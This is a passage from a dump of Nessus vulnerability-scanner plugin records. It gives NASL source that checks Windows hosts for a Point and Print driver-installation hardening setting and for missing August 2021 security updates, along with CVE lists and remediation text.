"bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-34481"], "modified": "2022-02-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "WINDOWS_RESTRICTDRIVERINSTALLATIONTOADMINISTRATORS_REG_CHECK.NASL", "href": "https://www.tenable.com/plugins/nessus/158243", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158243);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/22\");\n\n script_name(english:\"Windows Operating System Hardening Measure (RestrictDriverInstallationToAdministrators)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is missing an operating system hardening measure.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote system may be in a vulnerable state to exploitation by having the \nHKLM\\Software\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint\\RestrictDriverInstallationToAdministrators registry\nkey set to 0.\");\n # https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a4e8dad8\");\n # https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9896731b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the DWORD registry value RestrictDriverInstallationToAdministrators under: HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint to 1\");\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) \n audit(AUDIT_SHARE_FAIL, share);\n\nhotfix_check_fversion_init();\nregistry_init();\nvar hklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\nvar key = '\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Printers\\\\PointAndPrint\\\\RestrictDriverInstallationToAdministrators';\nvar value = get_registry_value(handle:hklm, item:key);\nRegCloseKey(handle:hklm);\n\nif (!isnull(value) && value == 0)\n{\n\n var report = '\\n Nessus detected the following insecure registry key configuration:\\n';\n report += ' - ' + key + ' is present in the registry with value ' + value + '\\n';\n\n hotfix_add_report(report);\n\n hotfix_security_note();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:36", "description": "The remote Windows host is missing security update 5005095 or cumulative update 5005090. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-34533, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484, CVE-2021-36927)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005095: Windows Server 2008 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-36927", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005095.NASL", "href": "https://www.tenable.com/plugins/nessus/152425", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152425);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-36927\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005095\");\n script_xref(name:\"MSKB\", value:\"5005090\");\n script_xref(name:\"MSFT\", value:\"MS21-5005095\");\n script_xref(name:\"MSFT\", value:\"MS21-5005090\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005095: Windows Server 2008 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005095\nor cumulative update 5005090. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-34533, CVE-2021-36936, CVE-2021-36937,\n CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484,\n CVE-2021-36927)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005095-security-only-update-a324fdbb-ce90-4c4d-8d9d-e9f2f2a57e0e\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?de72daa6\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005090-monthly-rollup-8feea9cd-25f9-41ef-b8e1-815211dc4e6c\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?910509c6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005095 or Cumulative Update KB5005090.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005095',\n '5005090'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005095, 5005090])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:06", "description": "The remote Windows host is missing security update 5005089 or cumulative update 5005088. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484, CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-34533, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005089: Windows 7 and Windows Server 2008 R2 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-34535", "CVE-2021-34537", "CVE-2021-36927", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-08-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005089.NASL", "href": "https://www.tenable.com/plugins/nessus/152436", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152436);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/30\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-34535\",\n \"CVE-2021-34537\",\n \"CVE-2021-36927\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n script_xref(name:\"MSKB\", value:\"5005036\");\n script_xref(name:\"MSKB\", value:\"5005088\");\n script_xref(name:\"MSKB\", value:\"5005089\");\n script_xref(name:\"MSFT\", value:\"MS21-5005036\");\n script_xref(name:\"MSFT\", value:\"MS21-5005088\");\n script_xref(name:\"MSFT\", value:\"MS21-5005089\");\n\n script_name(english:\"KB5005089: Windows 7 and Windows Server 2008 R2 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005089\nor cumulative update 5005088. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484,\n CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-34533, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005089-security-only-update-28805642-8266-40f9-a2be-9003329f661c\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?383d9541\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005088-monthly-rollup-69ec750d-30ee-4cbd-82eb-0b1ec2fd5f78\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7d931097\");\n # https://support.microsoft.com/en-us/topic/kb5005036-cumulative-security-update-for-internet-explorer-august-10-2021-621b1edb-b461-4d99-ae3e-5add55e53895\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fe73cef\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005089 or Cumulative Update KB5005088.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005089',\n '5005088'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1', \n sp:1,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005089, 5005088])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:36", "description": "The remote Windows host is missing security update 5005094 or cumulative update 5005099. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34533, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005094: Windows Server 2012 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-34535", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005094.NASL", "href": "https://www.tenable.com/plugins/nessus/152421", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152421);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-34535\",\n \"CVE-2021-36926\",\n \"CVE-2021-36927\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005094\");\n script_xref(name:\"MSKB\", value:\"5005036\");\n script_xref(name:\"MSKB\", value:\"5005099\");\n script_xref(name:\"MSFT\", value:\"MS21-5005094\");\n script_xref(name:\"MSFT\", value:\"MS21-5005036\");\n script_xref(name:\"MSFT\", value:\"MS21-5005099\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005094: Windows Server 2012 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005094\nor cumulative update 5005099. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34533, CVE-2021-34535,\n CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005094-security-only-update-276b95ad-c923-454c-8758-5b90175d86cc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ed9c2c14\");\n # https://support.microsoft.com/en-us/topic/kb5005036-cumulative-security-update-for-internet-explorer-august-10-2021-621b1edb-b461-4d99-ae3e-5add55e53895\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fe73cef\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005099-monthly-rollup-34a20feb-f899-4d10-91e0-d5ab32c4e009\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9af3c64c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005094 or Cumulative Update KB5005099.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005099',\n '5005094'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005099, 5005094])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:36", "description": "The remote Windows host is missing security update 5005106 or cumulative update 5005076. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34533, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005106: Windows Server 2012 R2 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-34535", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005106.NASL", "href": "https://www.tenable.com/plugins/nessus/152433", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152433);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-34535\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36927\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005036\");\n script_xref(name:\"MSKB\", value:\"5005076\");\n script_xref(name:\"MSKB\", value:\"5005106\");\n script_xref(name:\"MSFT\", value:\"MS21-5005036\");\n script_xref(name:\"MSFT\", value:\"MS21-5005076\");\n script_xref(name:\"MSFT\", value:\"MS21-5005106\");\n 